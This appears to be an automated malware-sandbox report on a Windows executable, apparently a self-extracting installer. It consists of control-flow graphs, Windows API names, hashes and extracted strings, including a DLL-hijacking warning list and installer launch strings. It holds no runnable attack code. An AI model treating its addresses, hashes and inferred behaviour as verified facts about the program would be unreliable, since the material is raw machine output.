                                          • API String ID: 3668304517-685763994
                                          • Opcode ID: 7c953252b80d9c6d828d99cffb63e66738df5846a4e2e92642ee3a83d7291b78
                                          • Instruction ID: 0a4e49c131bbbdca71f2d1b38f7b794a49e1186d4aa412521cfa47200cfbd025
                                          • Opcode Fuzzy Hash: 7c953252b80d9c6d828d99cffb63e66738df5846a4e2e92642ee3a83d7291b78
                                          • Instruction Fuzzy Hash: 3EE28662A086C196EA64EB2DE1403EEE761FBA6740F804132DF9D47AB9CF3CE455C710
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID: CMT
                                          • API String ID: 3668304517-2756464174
                                          • Opcode ID: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
                                          • Instruction ID: 3c21b9df615f60f96200f0896dc44ba09a2cf563133bf331ea7378866cb7e884
                                          • Opcode Fuzzy Hash: 55bf8bc242d77ff464b4b637a4409c1e03917795df1080568c491ddd117196ec
                                          • Instruction Fuzzy Hash: 35E20722B186824AEB14EB3DD5502FDA7A1FB66784F800035DF5E476A9DF3CE559C320

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3478 7ff7bb2440bc-7ff7bb2440f3 3479 7ff7bb2440f9-7ff7bb244101 3478->3479 3480 7ff7bb2441d2-7ff7bb2441df FindNextFileW 3478->3480 3481 7ff7bb244106-7ff7bb244118 FindFirstFileW 3479->3481 3482 7ff7bb244103 3479->3482 3483 7ff7bb2441e1-7ff7bb2441f1 GetLastError 3480->3483 3484 7ff7bb2441f3-7ff7bb2441f6 3480->3484 3481->3484 3485 7ff7bb24411e-7ff7bb244146 call 7ff7bb246a0c 3481->3485 3482->3481 3486 7ff7bb2441ca-7ff7bb2441cd 3483->3486 3487 7ff7bb2441f8-7ff7bb244200 3484->3487 3488 7ff7bb244211-7ff7bb244253 call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb248090 3484->3488 3498 7ff7bb244148-7ff7bb244164 FindFirstFileW 3485->3498 3499 7ff7bb244167-7ff7bb244170 3485->3499 3490 7ff7bb2442eb-7ff7bb24430e call 7ff7bb262320 3486->3490 3492 7ff7bb244202 3487->3492 3493 7ff7bb244205-7ff7bb24420c call 7ff7bb2320b0 3487->3493 3514 7ff7bb24428c-7ff7bb2442e6 call 7ff7bb24f168 * 3 3488->3514 3515 7ff7bb244255-7ff7bb24426c 3488->3515 3492->3493 3493->3488 3498->3499 3502 7ff7bb2441a9-7ff7bb2441ad 3499->3502 3503 7ff7bb244172-7ff7bb244189 3499->3503 3502->3484 3507 7ff7bb2441af-7ff7bb2441be GetLastError 3502->3507 3505 7ff7bb24418b-7ff7bb24419e 3503->3505 3506 7ff7bb2441a4 call 7ff7bb26220c 3503->3506 3505->3506 3509 7ff7bb244315-7ff7bb24431b call 7ff7bb267904 3505->3509 3506->3502 3511 7ff7bb2441c8 3507->3511 3512 7ff7bb2441c0-7ff7bb2441c6 3507->3512 3511->3486 3512->3486 3512->3511 3514->3490 3517 7ff7bb244287 call 7ff7bb26220c 3515->3517 3518 7ff7bb24426e-7ff7bb244281 3515->3518 3517->3514 3518->3517 3521 7ff7bb24430f-7ff7bb244314 call 7ff7bb267904 3518->3521 3521->3509
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                          • String ID:
                                          • API String ID: 474548282-0
                                          • Opcode ID: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                          • Instruction ID: 29af85474b403bef1970096778bf99eb415331942546441bb645bdee4fcdf9f7
                                          • Opcode Fuzzy Hash: 3ee96c9aed3c94a745cca2dc02a0ae9902b722a9ff44476fc619c6065aa41b54
                                          • Instruction Fuzzy Hash: 7861B762A08A4281EE10EB1DE4512ADA361FBA67A4F905331EFBD47AEDDF3CD544C710

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 7ff7bb24dfd0-7ff7bb24e024 call 7ff7bb262450 GetModuleHandleW 3 7ff7bb24e07b-7ff7bb24e3a5 0->3 4 7ff7bb24e026-7ff7bb24e039 GetProcAddress 0->4 5 7ff7bb24e3ab-7ff7bb24e3b4 call 7ff7bb26b788 3->5 6 7ff7bb24e503-7ff7bb24e521 call 7ff7bb246454 call 7ff7bb247df4 3->6 7 7ff7bb24e03b-7ff7bb24e04a 4->7 8 7ff7bb24e053-7ff7bb24e066 GetProcAddress 4->8 5->6 16 7ff7bb24e3ba-7ff7bb24e3fd call 7ff7bb246454 CreateFileW 5->16 19 7ff7bb24e525-7ff7bb24e52f call 7ff7bb2451a4 6->19 7->8 8->3 9 7ff7bb24e068-7ff7bb24e078 8->9 9->3 22 7ff7bb24e403-7ff7bb24e416 SetFilePointer 16->22 23 7ff7bb24e4f0-7ff7bb24e4fe CloseHandle call 7ff7bb231fa0 16->23 27 7ff7bb24e564-7ff7bb24e5ac call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb248090 call 7ff7bb231fa0 call 7ff7bb2432bc 19->27 28 7ff7bb24e531-7ff7bb24e53c call 7ff7bb24dd88 19->28 22->23 25 7ff7bb24e41c-7ff7bb24e43e ReadFile 22->25 23->6 25->23 29 7ff7bb24e444-7ff7bb24e452 25->29 66 7ff7bb24e5b1-7ff7bb24e5b4 27->66 28->27 40 7ff7bb24e53e-7ff7bb24e562 CompareStringW 28->40 32 7ff7bb24e458-7ff7bb24e4ac call 7ff7bb26797c call 7ff7bb23129c 29->32 33 7ff7bb24e800-7ff7bb24e807 call 7ff7bb262624 29->33 49 7ff7bb24e4c3-7ff7bb24e4d9 call 7ff7bb24d0a0 32->49 40->27 43 7ff7bb24e5bd-7ff7bb24e5c6 40->43 43->19 46 7ff7bb24e5cc 43->46 50 7ff7bb24e5d1-7ff7bb24e5d4 46->50 61 7ff7bb24e4db-7ff7bb24e4eb call 7ff7bb231fa0 * 2 49->61 62 7ff7bb24e4ae-7ff7bb24e4be call 7ff7bb24dd88 49->62 53 7ff7bb24e5d6-7ff7bb24e5d9 50->53 54 7ff7bb24e63f-7ff7bb24e642 50->54 59 7ff7bb24e5dd-7ff7bb24e62d call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb248090 call 7ff7bb231fa0 call 7ff7bb2432bc 53->59 57 7ff7bb24e648-7ff7bb24e65b call 7ff7bb247eb0 call 7ff7bb2451a4 54->57 58 7ff7bb24e7c2-7ff7bb24e7ff call 7ff7bb231fa0 * 2 call 7ff7bb262320 54->58 84 7ff7bb24e706-7ff7bb24e753 call 7ff7bb24da98 AllocConsole 57->84 85 7ff7bb24e661-7ff7bb24e701 call 7ff7bb24dd88 * 2 call 7ff7bb24aae0 call 7ff7bb24da98 call 7ff7bb24aae0 call 7ff7bb24dc2c call 7ff7bb2587ac call 7ff7bb2319e0 57->85 106 7ff7bb24e63c 59->106 107 7ff7bb24e62f-7ff7bb24e638 59->107 61->23 62->49 72 7ff7bb24e5ce 66->72 73 7ff7bb24e5b6 66->73 72->50 73->43 95 7ff7bb24e755-7ff7bb24e7aa GetCurrentProcessId AttachConsole call 7ff7bb24e868 call 7ff7bb24e858 GetStdHandle WriteConsoleW Sleep FreeConsole 84->95 96 7ff7bb24e7b0 84->96 100 7ff7bb24e7b4-7ff7bb24e7bb call 7ff7bb2319e0 ExitProcess 85->100 95->96 96->100 106->54 107->59 111 7ff7bb24e63a 107->111 111->54
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                          • API String ID: 1496594111-2013832382
                                          • Opcode ID: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                          • Instruction ID: 141b2ba5e31a7058ec1c95d9c20243836e359592805bccce569d69f87cd1810c
                                          • Opcode Fuzzy Hash: 7c4a34b53ce793e8483b627db677786fa0ac65cb43c3a9d0b7710463073bebd5
                                          • Instruction Fuzzy Hash: 31320931A09B82A9EB11AF2DE8411E9B3A4FB66354F900236DF4D06B79EF3CD654C354
                                          APIs
                                            • Part of subcall function 00007FF7BB248E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB248F8D
                                          • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7BB249F75
                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24A42F
                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB24A435
                                            • Part of subcall function 00007FF7BB250BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7BB250B44), ref: 00007FF7BB250BE9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                          • API String ID: 3629253777-3268106645
                                          • Opcode ID: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
                                          • Instruction ID: 79462e5aa2b7836cd35c3848e705c65d7b5044e9fadb6ca6be3da95ac9889090
                                          • Opcode Fuzzy Hash: 137a8823fd4522e36ba74be14e40dc9d8de557d7e1016f60fbe5fb59c02e5768
                                          • Instruction Fuzzy Hash: FF62A022A19A4285EB10EB2DD4852FDA361FB67784FC05131DF4E47AADEF38E945C360

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1910 7ff7bb261900-7ff7bb261989 call 7ff7bb261558 1913 7ff7bb26198b-7ff7bb2619af call 7ff7bb261868 RaiseException 1910->1913 1914 7ff7bb2619b4-7ff7bb2619d1 1910->1914 1922 7ff7bb261bb8-7ff7bb261bd5 1913->1922 1916 7ff7bb2619d3-7ff7bb2619e4 1914->1916 1917 7ff7bb2619e6-7ff7bb2619ea 1914->1917 1919 7ff7bb2619ed-7ff7bb2619f9 1916->1919 1917->1919 1920 7ff7bb2619fb-7ff7bb261a0d 1919->1920 1921 7ff7bb261a1a-7ff7bb261a1d 1919->1921 1930 7ff7bb261b89-7ff7bb261b93 1920->1930 1931 7ff7bb261a13 1920->1931 1923 7ff7bb261ac4-7ff7bb261acb 1921->1923 1924 7ff7bb261a23-7ff7bb261a26 1921->1924 1926 7ff7bb261acd-7ff7bb261adc 1923->1926 1927 7ff7bb261adf-7ff7bb261ae2 1923->1927 1928 7ff7bb261a3d-7ff7bb261a52 LoadLibraryExA 1924->1928 1929 7ff7bb261a28-7ff7bb261a3b 1924->1929 1926->1927 1932 7ff7bb261ae8-7ff7bb261aec 1927->1932 1933 7ff7bb261b85 1927->1933 1934 7ff7bb261aa9-7ff7bb261ab2 1928->1934 1935 7ff7bb261a54-7ff7bb261a67 GetLastError 1928->1935 1929->1928 1929->1934 1942 7ff7bb261b95-7ff7bb261ba6 1930->1942 1943 7ff7bb261bb0 call 7ff7bb261868 1930->1943 1931->1921 1940 7ff7bb261b1b-7ff7bb261b2e GetProcAddress 1932->1940 1941 7ff7bb261aee-7ff7bb261af2 1932->1941 1933->1930 1936 7ff7bb261abd 1934->1936 1937 7ff7bb261ab4-7ff7bb261ab7 FreeLibrary 1934->1937 1944 7ff7bb261a7e-7ff7bb261aa4 call 7ff7bb261868 RaiseException 1935->1944 1945 7ff7bb261a69-7ff7bb261a7c 1935->1945 1936->1923 1937->1936 1940->1933 1946 7ff7bb261b30-7ff7bb261b43 GetLastError 1940->1946 1941->1940 1947 7ff7bb261af4-7ff7bb261aff 1941->1947 1942->1943 1955 7ff7bb261bb5 1943->1955 1944->1922 1945->1934 1945->1944 1951 7ff7bb261b5a-7ff7bb261b81 call 7ff7bb261868 RaiseException call 7ff7bb261558 1946->1951 1952 7ff7bb261b45-7ff7bb261b58 1946->1952 1947->1940 1953 7ff7bb261b01-7ff7bb261b08 1947->1953 1951->1933 1952->1933 1952->1951 1953->1940 1957 7ff7bb261b0a-7ff7bb261b0f 1953->1957 1955->1922 1957->1940 1960 7ff7bb261b11-7ff7bb261b19 1957->1960 1960->1933 1960->1940
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                          • String ID: H
                                          • API String ID: 3432403771-2852464175
                                          • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                          • Instruction ID: c2d6e227a3b047790646567e59e090eaa409d489500d56d461c7c8cddc2ace89
                                          • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                          • Instruction Fuzzy Hash: 36916D22A15B128AEB00DF6ED8442ECB3A1BB19B55B855435CF0E57768EF38E845C320

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1990 7ff7bb25f4e0-7ff7bb25f523 1991 7ff7bb25f529-7ff7bb25f565 call 7ff7bb263cf0 1990->1991 1992 7ff7bb25f894-7ff7bb25f8b9 call 7ff7bb231fa0 call 7ff7bb262320 1990->1992 1997 7ff7bb25f567 1991->1997 1998 7ff7bb25f56a-7ff7bb25f571 1991->1998 1997->1998 2000 7ff7bb25f573-7ff7bb25f577 1998->2000 2001 7ff7bb25f582-7ff7bb25f586 1998->2001 2003 7ff7bb25f57c-7ff7bb25f580 2000->2003 2004 7ff7bb25f579 2000->2004 2005 7ff7bb25f58b-7ff7bb25f596 2001->2005 2006 7ff7bb25f588 2001->2006 2003->2005 2004->2003 2007 7ff7bb25f59c 2005->2007 2008 7ff7bb25f628 2005->2008 2006->2005 2009 7ff7bb25f5a2-7ff7bb25f5a9 2007->2009 2010 7ff7bb25f62c-7ff7bb25f62f 2008->2010 2011 7ff7bb25f5ab 2009->2011 2012 7ff7bb25f5ae-7ff7bb25f5b3 2009->2012 2013 7ff7bb25f637-7ff7bb25f63a 2010->2013 2014 7ff7bb25f631-7ff7bb25f635 2010->2014 2011->2012 2017 7ff7bb25f5e5-7ff7bb25f5f0 2012->2017 2018 7ff7bb25f5b5 2012->2018 2015 7ff7bb25f63c-7ff7bb25f643 2013->2015 2016 7ff7bb25f660-7ff7bb25f673 call 7ff7bb2463ac 2013->2016 2014->2013 2014->2016 2015->2016 2019 7ff7bb25f645-7ff7bb25f65c 2015->2019 2031 7ff7bb25f698-7ff7bb25f6ed call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb2432a8 call 7ff7bb231fa0 2016->2031 2032 7ff7bb25f675-7ff7bb25f693 call 7ff7bb2513c4 2016->2032 2021 7ff7bb25f5f5-7ff7bb25f5fa 2017->2021 2022 7ff7bb25f5f2 2017->2022 2023 7ff7bb25f5ca-7ff7bb25f5d0 2018->2023 2019->2016 2027 7ff7bb25f8ba-7ff7bb25f8c1 2021->2027 2028 7ff7bb25f600-7ff7bb25f607 2021->2028 2022->2021 2024 7ff7bb25f5b7-7ff7bb25f5be 2023->2024 2025 7ff7bb25f5d2 2023->2025 2035 7ff7bb25f5c3-7ff7bb25f5c8 2024->2035 2036 7ff7bb25f5c0 2024->2036 2025->2017 2029 7ff7bb25f8c3 2027->2029 2030 7ff7bb25f8c6-7ff7bb25f8cb 2027->2030 2033 7ff7bb25f60c-7ff7bb25f612 2028->2033 2034 7ff7bb25f609 2028->2034 2029->2030 2038 7ff7bb25f8de-7ff7bb25f8e6 2030->2038 2039 7ff7bb25f8cd-7ff7bb25f8d4 2030->2039 2057 7ff7bb25f6ef-7ff7bb25f73d call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb245b60 call 7ff7bb231fa0 2031->2057 2058 7ff7bb25f742-7ff7bb25f74f ShellExecuteExW 2031->2058 2032->2031 2033->2027 2042 7ff7bb25f618-7ff7bb25f622 2033->2042 2034->2033 2035->2023 2037 7ff7bb25f5d4-7ff7bb25f5db 2035->2037 2036->2035 2043 7ff7bb25f5dd 2037->2043 2044 7ff7bb25f5e0 2037->2044 2047 7ff7bb25f8eb-7ff7bb25f8f6 2038->2047 2048 7ff7bb25f8e8 2038->2048 2045 7ff7bb25f8d9 2039->2045 2046 7ff7bb25f8d6 2039->2046 2042->2008 2042->2009 2043->2044 2044->2017 2045->2038 2046->2045 2047->2010 2048->2047 2057->2058 2060 7ff7bb25f846-7ff7bb25f84e 2058->2060 2061 7ff7bb25f755-7ff7bb25f75f 2058->2061 2063 7ff7bb25f850-7ff7bb25f866 2060->2063 2064 7ff7bb25f882-7ff7bb25f88f 2060->2064 2065 7ff7bb25f76f-7ff7bb25f772 2061->2065 2066 7ff7bb25f761-7ff7bb25f764 2061->2066 2068 7ff7bb25f87d call 7ff7bb26220c 2063->2068 2069 7ff7bb25f868-7ff7bb25f87b 2063->2069 2064->1992 2071 7ff7bb25f78e-7ff7bb25f7ad call 7ff7bb29e1b8 call 7ff7bb25fe24 2065->2071 2072 7ff7bb25f774-7ff7bb25f77f call 7ff7bb29e188 2065->2072 2066->2065 2070 7ff7bb25f766-7ff7bb25f76d 2066->2070 2068->2064 2069->2068 2076 7ff7bb25f8fb-7ff7bb25f903 call 7ff7bb267904 2069->2076 2070->2065 2078 7ff7bb25f7e3-7ff7bb25f7f0 CloseHandle 2070->2078 2071->2078 2098 7ff7bb25f7af-7ff7bb25f7b2 2071->2098 2072->2071 2087 7ff7bb25f781-7ff7bb25f78c ShowWindow 2072->2087 2083 7ff7bb25f805-7ff7bb25f80c 2078->2083 2084 7ff7bb25f7f2-7ff7bb25f803 call 7ff7bb2513c4 2078->2084 2085 7ff7bb25f82e-7ff7bb25f830 2083->2085 2086 7ff7bb25f80e-7ff7bb25f811 2083->2086 2084->2083 2084->2085 2085->2060 2093 7ff7bb25f832-7ff7bb25f835 2085->2093 2086->2085 2092 7ff7bb25f813-7ff7bb25f828 2086->2092 2087->2071 2092->2085 2093->2060 2097 7ff7bb25f837-7ff7bb25f845 ShowWindow 2093->2097 2097->2060 2098->2078 2100 7ff7bb25f7b4-7ff7bb25f7c5 GetExitCodeProcess 2098->2100 2100->2078 2101 7ff7bb25f7c7-7ff7bb25f7dc 2100->2101 2101->2078
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                          • String ID: .exe$.inf$Install$p
                                          • API String ID: 1054546013-3607691742
                                          • Opcode ID: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
                                          • Instruction ID: 697f4244138c66917e66768090bcb85ed25832db8f129b191e89ca611cf19078
                                          • Opcode Fuzzy Hash: db8ecbd514ff322f29a974296a08b1056670a56b0f2c036ad5285174391dee78
                                          • Instruction Fuzzy Hash: BCC18122F1960295FA00EB2DD9842F9A361BFAAB84F844435DF4D476BDDF3CE8558324

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                          • String ID:
                                          • API String ID: 4119318379-0
                                          • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                          • Instruction ID: 5a7ac68433c0ac65be18979e581e0acb4c91ee34bb0cea7585a5388ee9ad0cda
                                          • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                          • Instruction Fuzzy Hash: 7241A131B1464286F700AF7DE814BEA6360FB9AB98F841135DE4E07BA9CF3DD4498764

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3529 7ff7bb2424c0-7ff7bb2424fb 3530 7ff7bb2424fd-7ff7bb242504 3529->3530 3531 7ff7bb242506 3529->3531 3530->3531 3532 7ff7bb242509-7ff7bb242578 3530->3532 3531->3532 3533 7ff7bb24257a 3532->3533 3534 7ff7bb24257d-7ff7bb2425a8 CreateFileW 3532->3534 3533->3534 3535 7ff7bb242688-7ff7bb24268d 3534->3535 3536 7ff7bb2425ae-7ff7bb2425de GetLastError call 7ff7bb246a0c 3534->3536 3537 7ff7bb242693-7ff7bb242697 3535->3537 3545 7ff7bb24262c 3536->3545 3546 7ff7bb2425e0-7ff7bb24262a CreateFileW GetLastError 3536->3546 3539 7ff7bb242699-7ff7bb24269c 3537->3539 3540 7ff7bb2426a5-7ff7bb2426a9 3537->3540 3539->3540 3542 7ff7bb24269e 3539->3542 3543 7ff7bb2426ab-7ff7bb2426af 3540->3543 3544 7ff7bb2426cf-7ff7bb2426e3 3540->3544 3542->3540 3543->3544 3547 7ff7bb2426b1-7ff7bb2426c9 SetFileTime 3543->3547 3548 7ff7bb24270c-7ff7bb242735 call 7ff7bb262320 3544->3548 3549 7ff7bb2426e5-7ff7bb2426f0 3544->3549 3550 7ff7bb242632-7ff7bb24263a 3545->3550 3546->3550 3547->3544 3552 7ff7bb242708 3549->3552 3553 7ff7bb2426f2-7ff7bb2426fa 3549->3553 3554 7ff7bb24263c-7ff7bb242653 3550->3554 3555 7ff7bb242673-7ff7bb242686 3550->3555 3552->3548 3559 7ff7bb2426fc 3553->3559 3560 7ff7bb2426ff-7ff7bb242703 call 7ff7bb2320b0 3553->3560 3556 7ff7bb24266e call 7ff7bb26220c 3554->3556 3557 7ff7bb242655-7ff7bb242668 3554->3557 3555->3537 3556->3555 3557->3556 3562 7ff7bb242736-7ff7bb24273b call 7ff7bb267904 3557->3562 3559->3560 3560->3552
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
